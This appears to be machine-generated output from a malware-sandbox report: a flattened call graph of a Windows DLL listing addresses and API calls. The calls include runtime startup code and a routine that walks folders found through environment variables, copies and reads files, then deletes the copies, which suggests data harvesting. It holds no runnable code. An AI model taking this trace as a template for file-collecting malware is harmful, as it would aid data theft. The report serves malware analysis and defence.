__dosmaperr 20 API calls 7464->7465 7465->7466 7469 10009ae4 7466->7469 7468->7459 7472 10008c9e RtlLeaveCriticalSection 7469->7472 7471 10009aea 7471->7463 7472->7471 7476 1000ad24 7473->7476 7475 1000adca 7475->7443 7477 1000ad30 ___scrt_is_nonwritable_in_current_image 7476->7477 7484 10008c7b RtlEnterCriticalSection 7477->7484 7479 1000ad3e 7480 1000ad65 7479->7480 7481 10006368 _free 20 API calls 7479->7481 7485 1000ad9a 7480->7485 7481->7480 7483 1000ad8d _abort 7483->7475 7484->7479 7488 10008c9e RtlLeaveCriticalSection 7485->7488 7487 1000ada4 7487->7483 7488->7487 7489->7417 7490->7397 6524 10002049 6525 10002055 ___scrt_is_nonwritable_in_current_image 6524->6525 6526 100020d3 6525->6526 6527 1000207d 6525->6527 6537 1000205e 6525->6537 6559 10002639 IsProcessorFeaturePresent 6526->6559 6538 1000244c 6527->6538 6530 100020da 6531 10002082 6547 10002308 6531->6547 6533 10002087 __RTC_Initialize 6550 100020c4 6533->6550 6535 1000209f 6553 1000260b 6535->6553 6539 10002451 ___scrt_release_startup_lock 6538->6539 6540 10002455 6539->6540 6543 10002461 6539->6543 6541 1000527a _abort 20 API calls 6540->6541 6542 1000245f 6541->6542 6542->6531 6544 1000246e 6543->6544 6545 1000499b _abort 28 API calls 6543->6545 6544->6531 6546 10004bbd 6545->6546 6546->6531 6563 100034c7 RtlInterlockedFlushSList 6547->6563 6549 10002312 6549->6533 6565 1000246f 6550->6565 6552 100020c9 ___scrt_release_startup_lock 6552->6535 6554 10002617 6553->6554 6555 1000262d 6554->6555 6606 100053ed 6554->6606 6555->6537 6560 1000264e ___scrt_fastfail 6559->6560 6561 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6560->6561 6562 10002744 ___scrt_fastfail 6561->6562 6562->6530 6564 100034d7 6563->6564 6564->6549 6570 100053ff 6565->6570 6577 10005c2b 6570->6577 6573 1000391b 6574 1000354d 6573->6574 6575 10003925 6573->6575 6574->6552 6588 10003b2c 6575->6588 6578 10002476 6577->6578 6579 10005c35 6577->6579 6578->6573 6581 10005db2 6579->6581 6582 10005c45 _free 5 API calls 6581->6582 6583 10005dd9 6582->6583 6584 10005df1 TlsFree 6583->6584 6585 10005de5 6583->6585 6584->6585 6586 10002ada _ValidateLocalCookies 5 API calls 6585->6586 6587 10005e02 6586->6587 6587->6578 6593 10003a82 6588->6593 6590 10003b46 6591 10003b5e TlsFree 6590->6591 6592 10003b52 6590->6592 6591->6592 6592->6574 6594 10003aaa 6593->6594 6598 10003aa6 __crt_fast_encode_pointer 6593->6598 6594->6598 6599 100039be 6594->6599 6597 10003ac4 GetProcAddress 6597->6598 6598->6590 6604 100039cd try_get_first_available_module 6599->6604 6600 100039ea LoadLibraryExW 6601 10003a05 GetLastError 6600->6601 6600->6604 6601->6604 6602 10003a60 FreeLibrary 6602->6604 6603 10003a77 6603->6597 6603->6598 6604->6600 6604->6602 6604->6603 6605 10003a38 LoadLibraryExW 6604->6605 6605->6604 6617 100074da 6606->6617 6609 10003529 6610 10003532 6609->6610 6611 10003543 6609->6611 6612 1000391b ___vcrt_uninitialize_ptd 6 API calls 6610->6612 6611->6555 6613 10003537 6612->6613 6621 10003972 6613->6621 6620 100074f3 6617->6620 6618 10002ada _ValidateLocalCookies 5 API calls 6619 10002625 6618->6619 6619->6609 6620->6618 6622 1000353c 6621->6622 6623 1000397d 6621->6623 6625 10003c50 6622->6625 6624 10003987 RtlDeleteCriticalSection 6623->6624 6624->6622 6624->6624 6626 10003c59 6625->6626 6628 10003c7f 6625->6628 6627 10003c69 FreeLibrary 6626->6627 6626->6628 6627->6626 6628->6611 7606 10009bcd 7607 10009bd0 7606->7607 7608 10009bd7 7607->7608 7609 10009bf9 7607->7609 7610 10009ccd 7608->7610 7627 10009645 7608->7627 7615 10009bef 7609->7615 7632 10009492 GetConsoleCP 7609->7632 7613 10006368 _free 20 API calls 7610->7613 7614 10009cc0 7610->7614 7616 10009cf2 7613->7616 7621 10002ada _ValidateLocalCookies 5 API calls 7614->7621 7615->7610 7615->7614 7617 10009ca9 7615->7617 7618 10006355 __dosmaperr 20 API calls 7616->7618 7619 10009cb0 7617->7619 7620 10009cc4 7617->7620 7618->7614 7623 10006368 _free 20 API calls 7619->7623 7622 10006332 __dosmaperr 20 API calls 7620->7622 7624 10009d15 7621->7624 7622->7614 7625 10009cb5 7623->7625 7626 10006355 __dosmaperr 20 API calls 7625->7626 7626->7614 7630 1000969f 7627->7630 7631 1000966a 7627->7631 7628 100096a1 GetLastError 7628->7630 7629 1000a181 WriteConsoleW CreateFileW 7629->7631 7630->7615 7631->7628 7631->7629 7631->7630 7636 100094f5 __fassign 7632->7636 7641 10009607 7632->7641 7633 10002ada _ValidateLocalCookies 5 API calls 7634 10009641 7633->7634 7634->7615 7637 1000957b WideCharToMultiByte 7636->7637 7640 100095d2 WriteFile 7636->7640 7636->7641 7642 10007c19 7636->7642 7638 100095a1 WriteFile 7637->7638 7637->7641 7638->7636 7639 1000962a GetLastError 7638->7639 7639->7641 7640->7636 7640->7639 7641->7633 7643 10005af6 _abort 38 API calls 7642->7643 7644 10007c24 7643->7644 7645 10007a00 38 API calls 7644->7645 7646 10007c34 7645->7646 7646->7636 6629 1000724e GetProcessHeap 6630 1000284f 6631 10002882 std::exception::exception 27 API calls 6630->6631 6632 1000285d 6631->6632 6969 100036d0 6970 100036e2 6969->6970 6972 100036f0 @_EH4_CallFilterFunc@8 6969->6972 6971 10002ada _ValidateLocalCookies 5 API calls 6970->6971 6971->6972 7491 10005351 7492 10005360 7491->7492 7496 10005374 7491->7496 7494 1000571e _free 20 API calls 7492->7494 7492->7496 7493 1000571e _free 20 API calls 7495 10005386 7493->7495 7494->7496 7497 1000571e _free 20 API calls 7495->7497 7496->7493 7498 10005399 7497->7498 7499 1000571e _free 20 API calls 7498->7499 7500 100053aa 7499->7500 7501 1000571e _free 20 API calls 7500->7501 7502 100053bb 7501->7502 7503 10008d52 7504 10008d74 7503->7504 7505 10008d5f 7503->7505 7508 10006355 __dosmaperr 20 API calls 7504->7508 7510 10008d99 7504->7510 7506 10006355 __dosmaperr 20 API calls 7505->7506 7507 10008d64 7506->7507 7509 10006368 _free 20 API calls 7507->7509 7511 10008da4 7508->7511 7512 10008d6c 7509->7512 7513 10006368 _free 20 API calls 7511->7513 7514 10008dac 7513->7514 7515 100062ac _abort 26 API calls 7514->7515 7515->7512 6973 100066d5 6974 100066e1 6973->6974 6975 100066f2 6974->6975 6976 100066eb FindClose 6974->6976 6977 10002ada _ValidateLocalCookies 5 API calls 6975->6977 6976->6975 6978 10006701 6977->6978 7647 100073d5 7648 100073e1 ___scrt_is_nonwritable_in_current_image 7647->7648 7657 10005671 RtlEnterCriticalSection 7648->7657 7650 100073e8 7656 10007406 7650->7656 7658 10007269 GetStartupInfoW 7650->7658 7654 10007417 _abort 7667 10007422 7656->7667 7657->7650 7659 10007286 7658->7659 7660 10007318 7658->7660 7659->7660 7661 100072dd GetFileType 7659->7661 7662 1000731f 7660->7662 7661->7659 7664 10007326 7662->7664 7663 10007369 GetStdHandle 7663->7664 7664->7663 7665 100073d1 7664->7665 7666 1000737c GetFileType 7664->7666 7665->7656 7666->7664 7670 100056b9 RtlLeaveCriticalSection 7667->7670 7669 10007429 7669->7654 7670->7669 6979 10004ed7 6980 10006d60 51 API calls 6979->6980 6981 10004ee9 6980->6981 6990 10007153 GetEnvironmentStringsW 6981->6990 6985 1000571e _free 20 API calls 6986 10004f29 6985->6986 6987 10004eff 6988 1000571e _free 20 API calls 6987->6988 6989 10004ef4 6988->6989 6989->6985 6991 1000716a 6990->6991 7001 100071bd 6990->7001 6994 10007170 WideCharToMultiByte 6991->6994 6992 100071c6 FreeEnvironmentStringsW 6993 10004eee 6992->6993 6993->6989 7002 10004f2f 6993->7002 6995 1000718c 6994->6995 6994->7001 6996 100056d0 21 API calls 6995->6996 6997 10007192 6996->6997 6998 100071af 6997->6998 6999 10007199 WideCharToMultiByte 6997->6999 7000 1000571e _free 20 API calls 6998->7000 6999->6998 7000->7001 7001->6992 7001->6993 7003 10004f44 7002->7003 7004 1000637b _free 20 API calls 7003->7004 7013 10004f6b 7004->7013 7005 10004fcf 7006 1000571e _free 20 API calls 7005->7006 7007 10004fe9 7006->7007 7007->6987 7008 1000637b _free 20 API calls 7008->7013 7009 10004fd1 7011 10005000 20 API calls 7009->7011 7010 1000544d ___std_exception_copy 26 API calls 7010->7013 7012 10004fd7 7011->7012 7015 1000571e _free 20 API calls 7012->7015 7013->7005 7013->7008 7013->7009 7013->7010 7014 10004ff3 7013->7014 7017 1000571e _free 20 API calls 7013->7017 7016 100062bc _abort 11 API calls 7014->7016 7015->7005 7018 10004fff 7016->7018 7017->7013 6633 1000ae59 6634 1000ae5f 6633->6634 6639 10008cc1 6634->6639 6637 10006332 __dosmaperr 20 API calls 6638 1000aedd 6637->6638 6640 10008cd0 6639->6640 6641 10008d37 6639->6641 6640->6641 6647 10008cfa 6640->6647 6642 10006368 _free 20 API calls 6641->6642 6643 10008d3c 6642->6643 6644 10006355 __dosmaperr 20 API calls 6643->6644 6645 10008d27 6644->6645 6645->6637 6645->6638 6646 10008d21 SetStdHandle 6646->6645 6647->6645 6647->6646 5795 10001c5b 5796 10001c6b ___scrt_fastfail 5795->5796 5799 100012ee 5796->5799 5798 10001c87 5800 10001324 ___scrt_fastfail 5799->5800 5801 100013b7 GetEnvironmentVariableW 5800->5801 5825 100010f1 5801->5825 5804 100010f1 57 API calls 5805 10001465 5804->5805 5806 100010f1 57 API calls 5805->5806 5807 10001479 5806->5807 5808 100010f1 57 API calls 5807->5808 5809 1000148d 5808->5809 5810 100010f1 57 API calls 5809->5810 5811 100014a1 5810->5811 5812 100010f1 57 API calls 5811->5812 5813 100014b5 lstrlenW 5812->5813 5814 100014d2 5813->5814 5815 100014d9 lstrlenW 5813->5815 5814->5798 5816 100010f1 57 API calls 5815->5816 5817 10001501 lstrlenW lstrcatW 5816->5817 5818 100010f1 57 API calls 5817->5818 5819 10001539 lstrlenW lstrcatW 5818->5819 5820 100010f1 57 API calls 5819->5820 5821 1000156b lstrlenW lstrcatW 5820->5821 5822 100010f1 57 API calls 5821->5822 5823 1000159d lstrlenW lstrcatW 5822->5823 5824 100010f1 57 API calls 5823->5824 5824->5814 5826 10001118 ___scrt_fastfail 5825->5826 5827 10001129 lstrlenW 5826->5827 5838 10002c40 5827->5838 5830 10001177 lstrlenW FindFirstFileW 5832 100011a0 5830->5832 5833 100011e1 5830->5833 5831 10001168 lstrlenW 5831->5830 5834 100011c7 FindNextFileW 5832->5834 5835 100011aa 5832->5835 5833->5804 5834->5832 5837 100011da FindClose 5834->5837 5835->5834 5840 10001000 5835->5840 5837->5833 5839 10001148 lstrcatW lstrlenW 5838->5839 5839->5830 5839->5831 5841 10001022 ___scrt_fastfail 5840->5841 5842 100010af 5841->5842 5843 1000102f lstrcatW lstrlenW 5841->5843 5846 100010b5 lstrlenW 5842->5846 5856 100010ad 5842->5856 5844 1000105a lstrlenW 5843->5844 5845 1000106b lstrlenW 5843->5845 5844->5845 5857 10001e89 lstrlenW 5845->5857 5871 10001e16 5846->5871 5849 10001088 GetFileAttributesW 5852 1000109c 5849->5852 5849->5856 5850 100010ca 5851 10001e89 5 API calls 5850->5851 5850->5856 5853 100010df 5851->5853 5852->5856 5863 1000173a 5852->5863 5876 100011ea 5853->5876 5856->5835 5858 10002c40 ___scrt_fastfail 5857->5858 5859 10001ea7 lstrcatW lstrlenW 5858->5859 5860 10001ed1 lstrcatW 5859->5860 5861 10001ec2 5859->5861 5860->5849 5861->5860 5862 10001ec7 lstrlenW 5861->5862 5862->5860 5864 10001747 ___scrt_fastfail 5863->5864 5891 10001cca 5864->5891 5867 1000199f 5867->5856 5869 10001824 ___scrt_fastfail _strlen 5869->5867 5911 100015da 5869->5911 5872 10001e29 5871->5872 5875 10001e4c 5871->5875 5873 10001e2d lstrlenW 5872->5873 5872->5875 5874 10001e3f lstrlenW 5873->5874 5873->5875 5874->5875 5875->5850 5877 1000120e ___scrt_fastfail 5876->5877 5878 10001e89 5 API calls 5877->5878 5879 10001220 GetFileAttributesW 5878->5879 5880 10001235 5879->5880 5881 10001246 5879->5881 5880->5881 5884 1000173a 35 API calls 5880->5884 5882 10001e89 5 API calls 5881->5882 5883 10001258 5882->5883 5885 100010f1 56 API calls 5883->5885 5884->5881 5886 1000126d 5885->5886 5887 10001e89 5 API calls 5886->5887 5888 1000127f ___scrt_fastfail 5887->5888 5889 100010f1 56 API calls 5888->5889 5890 100012e6 5889->5890 5890->5856 5892 10001cf1 ___scrt_fastfail 5891->5892 5893 10001d0f CopyFileW CreateFileW 5892->5893 5894 10001d44 DeleteFileW 5893->5894 5895 10001d55 GetFileSize 5893->5895 5900 10001808 5894->5900 5896 10001ede 22 API calls 5895->5896 5897 10001d66 ReadFile 5896->5897 5898 10001d94 CloseHandle DeleteFileW 5897->5898 5899 10001d7d CloseHandle DeleteFileW 5897->5899 5898->5900 5899->5900 5900->5867 5901 10001ede 5900->5901 5903 1000222f 5901->5903 5904 1000224e 5903->5904 5906 10002250 5903->5906 5919 1000474f 5903->5919 5924 100047e5 5903->5924 5904->5869 5907 10002908 5906->5907 5931 100035d2 5906->5931 5908 100035d2 __CxxThrowException@8 RaiseException 5907->5908 5910 10002925 5908->5910 5910->5869 5912 1000160c _strcat _strlen 5911->5912 5913 1000163c lstrlenW 5912->5913 6019 10001c9d 5913->6019 5915 10001655 lstrcatW lstrlenW 5916 10001678 5915->5916 5917 10001693 ___scrt_fastfail 5916->5917 5918 1000167e lstrcatW 5916->5918 5917->5869 5918->5917 5934 10004793 5919->5934 5921 10004765 5940 10002ada 5921->5940 5923 1000478f 5923->5903 5929 100056d0 _free 5924->5929 5925 1000570e 5953 10006368 5925->5953 5927 100056f9 RtlAllocateHeap 5928 1000570c 5927->5928 5927->5929 5928->5903 5929->5925 5929->5927 5930 1000474f _free 7 API calls 5929->5930 5930->5929 5933 100035f2 RaiseException 5931->5933 5933->5907 5935 1000479f ___scrt_is_nonwritable_in_current_image 5934->5935 5947 10005671 RtlEnterCriticalSection 5935->5947 5937 100047aa 5948 100047dc 5937->5948 5939 100047d1 _abort 5939->5921 5941 10002ae3 5940->5941 5942 10002ae5 IsProcessorFeaturePresent 5940->5942 5941->5923 5944 10002b58 5942->5944 5952 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5944->5952 5946 10002c3b 5946->5923 5947->5937 5951 100056b9 RtlLeaveCriticalSection 5948->5951 5950 100047e3 5950->5939 5951->5950 5952->5946 5956 10005b7a GetLastError 5953->5956 5957 10005b93 5956->5957 5958 10005b99 5956->5958 5975 10005e08 5957->5975 5963 10005bf0 SetLastError 5958->5963 5982 1000637b 5958->5982 5962 10005bb3 5989 1000571e 5962->5989 5964 10005bf9 5963->5964 5964->5928 5968 10005bb9 5970 10005be7 SetLastError 5968->5970 5969 10005bcf 6002 1000593c 5969->6002 5970->5964 5973 1000571e _free 17 API calls 5974 10005be0 5973->5974 5974->5963 5974->5970 6007 10005c45 5975->6007 5977 10005e2f 5978 10005e47 TlsGetValue 5977->5978 5980 10005e3b 5977->5980 5978->5980 5979 10002ada _ValidateLocalCookies 5 API calls 5981 10005e58 5979->5981 5980->5979 5981->5958 5988 10006388 _free 5982->5988 5983 100063c8 5985 10006368 _free 19 API calls 5983->5985 5984 100063b3 RtlAllocateHeap 5986 10005bab 5984->5986 5984->5988 5985->5986 5986->5962 5995 10005e5e 5986->5995 5987 1000474f _free 7 API calls 5987->5988 5988->5983 5988->5984 5988->5987 5990 10005752 _free 5989->5990 5991 10005729 HeapFree 5989->5991 5990->5968 5991->5990 5992 1000573e 5991->5992 5993 10006368 _free 18 API calls 5992->5993 5994 10005744 GetLastError 5993->5994 5994->5990 5996 10005c45 _free 5 API calls 5995->5996 5997 10005e85 5996->5997 5998 10005ea0 TlsSetValue 5997->5998 5999 10005e94 5997->5999 5998->5999 6000 10002ada _ValidateLocalCookies 5 API calls 5999->6000 6001 10005bc8 6000->6001 6001->5962 6001->5969 6013 10005914 6002->6013 6011 10005c71 6007->6011 6012 10005c75 __crt_fast_encode_pointer 6007->6012 6008 10005c95 6010 10005ca1 GetProcAddress 6008->6010 6008->6012 6009 10005ce1 _free LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6009->6011 6010->6012 6011->6008 6011->6009 6011->6012 6012->5977 6014 10005854 _free RtlEnterCriticalSection RtlLeaveCriticalSection 6013->6014 6015 10005938 6014->6015 6016 100058c4 6015->6016 6017 10005758 _free 20 API calls 6016->6017 6018 100058e8 6017->6018 6018->5973 6020 10001ca6 _strlen 6019->6020 6020->5915 7019 100020db 7020 100020e7 ___scrt_is_nonwritable_in_current_image 7019->7020 7021 10002110 dllmain_raw 7020->7021 7025 1000210b 7020->7025 7031 100020f6 7020->7031 7022 1000212a 7021->7022 7021->7031 7032 10001eec 7022->7032 7024 10002177 7026 10001eec 31 API calls 7024->7026 7024->7031 7025->7024 7028 10001eec 31 API calls 7025->7028 7025->7031 7027 1000218a 7026->7027 7029 10002193 dllmain_raw 7027->7029 7027->7031 7030 1000216d dllmain_raw 7028->7030 7029->7031 7030->7024 7033 10001ef7 7032->7033 7034 10001f2a dllmain_crt_process_detach 7032->7034 7035 10001f1c dllmain_crt_process_attach 7033->7035 7036 10001efc 7033->7036 7041 10001f06 7034->7041 7035->7041 7037 10001f12 7036->7037 7039 10001f01 7036->7039 7047 100023ec 7037->7047 7039->7041 7042 1000240b 7039->7042 7041->7025 7055 100053e5 7042->7055 7153 10003513 7047->7153 7050 100023f5 7050->7041 7053 10002408 7053->7041 7054 1000351e 7 API calls 7054->7050 7061 10005aca 7055->7061 7058 1000351e 7137 10003820 7058->7137 7060 10002415 7060->7041 7062 10005ad4 7061->7062 7063 10002410 7061->7063 7064 10005e08 _free 11 API calls 7062->7064 7063->7058 7065 10005adb 7064->7065 7065->7063 7066 10005e5e _free 11 API calls 7065->7066 7067 10005aee 7066->7067 7069 100059b5 7067->7069 7070 100059c0 7069->7070 7071 100059d0 7069->7071 7075 100059d6 7070->7075 7071->7063 7074 1000571e _free 20 API calls 7074->7071 7076 100059ef 7075->7076 7077 100059e9 7075->7077 7079 1000571e _free 20 API calls 7076->7079 7078 1000571e _free 20 API calls 7077->7078 7078->7076 7080 100059fb 7079->7080 7081 1000571e _free 20 API calls 7080->7081 7082 10005a06 7081->7082 7083 1000571e _free 20 API calls 7082->7083 7084 10005a11 7083->7084 7085 1000571e _free 20 API calls 7084->7085 7086 10005a1c 7085->7086 7087 1000571e _free 20 API calls 7086->7087 7088 10005a27 7087->7088 7089 1000571e _free 20 API calls 7088->7089 7090 10005a32 7089->7090 7091 1000571e _free 20 API calls 7090->7091 7092 10005a3d 7091->7092 7093 1000571e _free 20 API calls 7092->7093 7094 10005a48 7093->7094 7095 1000571e _free 20 API calls 7094->7095 7096 10005a56 7095->7096 7101 1000589c 7096->7101 7107 100057a8 7101->7107 7103 100058c0 7104 100058ec 7103->7104 7120 10005809 7104->7120 7106 10005910 7106->7074 7108 100057b4 ___scrt_is_nonwritable_in_current_image 7107->7108 7115 10005671 RtlEnterCriticalSection 7108->7115 7111 100057be 7112 1000571e _free 20 API calls 7111->7112 7113 100057e8 7111->7113 7112->7113 7116 100057fd 7113->7116 7114 100057f5 _abort 7114->7103 7115->7111 7119 100056b9 RtlLeaveCriticalSection 7116->7119 7118 10005807 7118->7114 7119->7118 7121 10005815 ___scrt_is_nonwritable_in_current_image 7120->7121 7128 10005671 RtlEnterCriticalSection 7121->7128 7123 1000581f 7129 10005a7f 7123->7129 7125 10005832 7133 10005848 7125->7133 7127 10005840 _abort 7127->7106 7128->7123 7130 10005a8e _free 7129->7130 7132 10005ab5 _free 7129->7132 7131 10007cc2 _free 20 API calls 7130->7131 7130->7132 7131->7132 7132->7125 7136 100056b9 RtlLeaveCriticalSection 7133->7136 7135 10005852 7135->7127 7136->7135 7138 1000382d 7137->7138 7142 1000384b ___vcrt_freefls@4 7137->7142 7139 1000383b 7138->7139 7143 10003b67 7138->7143 7148 10003ba2 7139->7148 7142->7060 7144 10003a82 try_get_function 5 API calls 7143->7144 7145 10003b81 7144->7145 7146 10003b99 TlsGetValue 7145->7146 7147 10003b8d 7145->7147 7146->7147 7147->7139 7149 10003a82 try_get_function 5 API calls 7148->7149 7150 10003bbc 7149->7150 7151 10003bd7 TlsSetValue 7150->7151 7152 10003bcb 7150->7152 7151->7152 7152->7142 7159 10003856 7153->7159 7155 100023f1 7155->7050 7156 100053da 7155->7156 7157 10005b7a _free 20 API calls 7156->7157 7158 100023fd 7157->7158 7158->7053 7158->7054 7160 10003862 GetLastError 7159->7160 7161 1000385f 7159->7161 7162 10003b67 ___vcrt_FlsGetValue 6 API calls 7160->7162 7161->7155 7163 10003877 7162->7163 7164 100038dc SetLastError 7163->7164 7165 10003ba2 ___vcrt_FlsSetValue 6 API calls 7163->7165 7170 10003896 7163->7170 7164->7155 7166 10003890 7165->7166 7167 10003ba2 ___vcrt_FlsSetValue 6 API calls 7166->7167 7169 100038b8 7166->7169 7166->7170 7167->7169 7168 10003ba2 ___vcrt_FlsSetValue 6 API calls 7168->7170 7169->7168 7169->7170 7170->7164 7671 10004bdd 7672 10004c08 7671->7672 7673 10004bec 7671->7673 7675 10006d60 51 API calls 7672->7675 7673->7672 7674 10004bf2 7673->7674 7676 10006368 _free 20 API calls 7674->7676 7677 10004c0f GetModuleFileNameA 7675->7677 7678 10004bf7 7676->7678 7679 10004c33 7677->7679 7680 100062ac _abort 26 API calls 7678->7680 7694 10004d01 7679->7694 7681 10004c01 7680->7681 7686 10004c72 7689 10004d01 38 API calls 7686->7689 7687 10004c66 7688 10006368 _free 20 API calls 7687->7688 7693 10004c6b 7688->7693 7691 10004c88 7689->7691 7690 1000571e _free 20 API calls 7690->7681 7692 1000571e _free 20 API calls 7691->7692 7691->7693 7692->7693 7693->7690 7696 10004d26 7694->7696 7698 10004d86 7696->7698 7706 100070eb 7696->7706 7697 10004c50 7700 10004e76 7697->7700 7698->7697 7699 100070eb 38 API calls 7698->7699 7699->7698 7701 10004c5d 7700->7701 7702 10004e8b 7700->7702 7701->7686 7701->7687 7702->7701 7703 1000637b _free 20 API calls 7702->7703 7704 10004eb9 7703->7704 7705 1000571e _free 20 API calls 7704->7705 7705->7701 7709 10007092 7706->7709 7710 100054a7 38 API calls 7709->7710 7711 100070a6 7710->7711 7711->7696 6648 10007260 GetStartupInfoW 6649 10007318 6648->6649 6650 10007286 6648->6650 6650->6649 6651 100072dd GetFileType 6650->6651 6651->6650 7712 1000a1e0 7715 1000a1fe 7712->7715 7714 1000a1f6 7719 1000a203 7715->7719 7716 1000aa53 21 API calls 7718 1000a42f 7716->7718 7717 1000a298 7717->7714 7718->7714 7719->7716 7719->7717 7516 10009d61 7517 10009d81 7516->7517 7520 10009db8 7517->7520 7519 10009dab 7521 10009dbf 7520->7521 7522 10009e20 7521->7522 7523 10009ddf 7521->7523 7524 1000aa17 21 API calls 7522->7524 7525 1000a90e 7522->7525 7523->7525 7527 1000aa17 21 API calls 7523->7527 7526 10009e6e 7524->7526 7525->7519 7526->7519 7528 1000a93e 7527->7528 7528->7519 7529 10006761 7530 100066e6 7529->7530 7531 1000677f 7529->7531 7532 100066f2 7530->7532 7533 100066eb FindClose 7530->7533 7537 100081a0 7531->7537 7535 10002ada _ValidateLocalCookies 5 API calls 7532->7535 7533->7532 7536 10006701 7535->7536 7538 100081d9 7537->7538 7539 100081dd 7538->7539 7550 10008205 7538->7550 7540 10006368 _free 20 API calls 7539->7540 7541 100081e2 7540->7541 7543 100062ac _abort 26 API calls 7541->7543 7542 10008529 7544 10002ada _ValidateLocalCookies 5 API calls 7542->7544 7545 100081ed 7543->7545 7546 10008536 7544->7546 7547 10002ada _ValidateLocalCookies 5 API calls 7545->7547 7546->7530 7548 100081f9 7547->7548 7548->7530 7550->7542 7551 100080c0 7550->7551 7554 100080db 7551->7554 7552 10002ada _ValidateLocalCookies 5 API calls 7553 10008152 7552->7553 7553->7550 7554->7552 6652 10006664 6653 10006675 6652->6653 6654 10002ada _ValidateLocalCookies 5 API calls 6653->6654 6655 10006701 6654->6655 6656 1000ac6b 6657 1000ac84 __startOneArgErrorHandling 6656->6657 6658 1000acad __startOneArgErrorHandling 6657->6658 6660 1000b2f0 6657->6660 6661 1000b329 __startOneArgErrorHandling 6660->6661 6663 1000b350 __startOneArgErrorHandling 6661->6663 6671 1000b5c1 6661->6671 6664 1000b393 6663->6664 6665 1000b36e 6663->6665 6684 1000b8b2 6664->6684 6675 1000b8e1 6665->6675 6668 1000b38e __startOneArgErrorHandling 6669 10002ada _ValidateLocalCookies 5 API calls 6668->6669 6670 1000b3b7 6669->6670 6670->6658 6672 1000b5ec __raise_exc 6671->6672 6673 1000b7e5 RaiseException 6672->6673 6674 1000b7fd 6673->6674 6674->6663 6676 1000b8f0 6675->6676 6677 1000b964 __startOneArgErrorHandling 6676->6677 6678 1000b90f __startOneArgErrorHandling 6676->6678 6679 1000b8b2 __startOneArgErrorHandling 20 API calls 6677->6679 6691 100078a3 6678->6691 6683 1000b95d 6679->6683 6682 1000b8b2 __startOneArgErrorHandling 20 API calls 6682->6683 6683->6668 6685 1000b8d4 6684->6685 6686 1000b8bf 6684->6686 6687 10006368 _free 20 API calls 6685->6687 6688 1000b8d9 6686->6688 6689 10006368 _free 20 API calls 6686->6689 6687->6688 6688->6668 6690 1000b8cc 6689->6690 6690->6668 6693 100078cb 6691->6693 6692 10002ada _ValidateLocalCookies 5 API calls 6694 100078e8 6692->6694 6693->6692 6694->6682 6694->6683 7720 100085eb 7724 1000853a 7720->7724 7721 1000854f 7722 10008554 7721->7722 7723 10006368 _free 20 API calls 7721->7723 7725 1000857a 7723->7725 7724->7721 7724->7722 7727 1000858b 7724->7727 7726 100062ac _abort 26 API calls 7725->7726 7726->7722 7727->7722 7728 10006368 _free 20 API calls 7727->7728 7728->7725 7729 100065ec 7734 100067bf 7729->7734 7732 1000571e _free 20 API calls 7733 100065ff 7732->7733 7739 100067f4 7734->7739 7737 100065f6 7737->7732 7738 1000571e _free 20 API calls 7738->7737 7740 10006806 7739->7740 7749 100067cd 7739->7749 7741 10006836 7740->7741 7742 1000680b 7740->7742 7741->7749 7750 100071d6 7741->7750 7743 1000637b _free 20 API calls 7742->7743 7744 10006814 7743->7744 7746 1000571e _free 20 API calls 7744->7746 7746->7749 7747 10006851 7748 1000571e _free 20 API calls 7747->7748 7748->7749 7749->7737 7749->7738 7751 100071e1 7750->7751 7752 10007209 7751->7752 7753 100071fa 7751->7753 7754 10007218 7752->7754 7759 10008a98 7752->7759 7755 10006368 _free 20 API calls 7753->7755 7766 10008acb 7754->7766 7757 100071ff ___scrt_fastfail 7755->7757 7757->7747 7760 10008aa3 7759->7760 7761 10008ab8 RtlSizeHeap 7759->7761 7762 10006368 _free 20 API calls 7760->7762 7761->7754 7763 10008aa8 7762->7763 7764 100062ac _abort 26 API calls 7763->7764 7765 10008ab3 7764->7765 7765->7754 7767 10008ae3 7766->7767 7768 10008ad8 7766->7768 7769 10008aeb 7767->7769 7776 10008af4 _free 7767->7776 7770 100056d0 21 API calls 7768->7770 7771 1000571e _free 20 API calls 7769->7771 7774 10008ae0 7770->7774 7771->7774 7772 10008af9 7775 10006368 _free 20 API calls 7772->7775 7773 10008b1e RtlReAllocateHeap 7773->7774 7773->7776 7774->7757 7775->7774 7776->7772 7776->7773 7777 1000474f _free 7 API calls 7776->7777 7777->7776 6695 10008c6e 6698 100056b9 RtlLeaveCriticalSection 6695->6698 6697 10008c79 6698->6697 6699 1000506f 6700 10005081 6699->6700 6702 10005087 6699->6702 6703 10005000 6700->6703 6704 1000502a 6703->6704 6705 1000500d 6703->6705 6704->6702 6706 10005024 6705->6706 6707 1000571e _free 20 API calls 6705->6707 6708 1000571e _free 20 API calls 6706->6708 6707->6705 6708->6704 7555 10003370 7566 10003330 7555->7566 7567 10003342 7566->7567 7568 1000334f 7566->7568 7569 10002ada _ValidateLocalCookies 5 API calls 7567->7569 7569->7568 6709 10009e71 6710 10009e95 6709->6710 6711 10009ee6 6710->6711 6714 10009f71 __startOneArgErrorHandling 6710->6714 6715 10009ef8 6711->6715 6717 1000aa53 6711->6717 6712 1000acad __startOneArgErrorHandling 6714->6712 6716 1000b2f0 21 API calls 6714->6716 6716->6712 6718 1000aa70 RtlDecodePointer 6717->6718 6720 1000aa80 6717->6720 6718->6720 6719 10002ada _ValidateLocalCookies 5 API calls 6722 1000ac67 6719->6722 6721 1000ab0d 6720->6721 6723 1000ab02 6720->6723 6725 1000aab7 6720->6725 6721->6723 6724 10006368 _free 20 API calls 6721->6724 6722->6715 6723->6719 6724->6723 6725->6723 6726 10006368 _free 20 API calls 6725->6726 6726->6723 6727 10008c72 6728 10008c79 6727->6728 6730 100056b9 RtlLeaveCriticalSection 6727->6730 6730->6728 7782 10005bff 7790 10005d5c 7782->7790 7785 10005b7a _free 20 API calls 7786 10005c1b 7785->7786 7787 10005c28 7786->7787 7788 10005c2b 11 API calls 7786->7788 7789 10005c13 7788->7789 7791 10005c45 _free 5 API calls 7790->7791 7792 10005d83 7791->7792 7793 10005d9b TlsAlloc 7792->7793 7794 10005d8c 7792->7794 7793->7794 7795 10002ada _ValidateLocalCookies 5 API calls 7794->7795 7796 10005c09 7795->7796 7796->7785 7796->7789

                                                                                                  Executed Functions

                                                                                                  Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

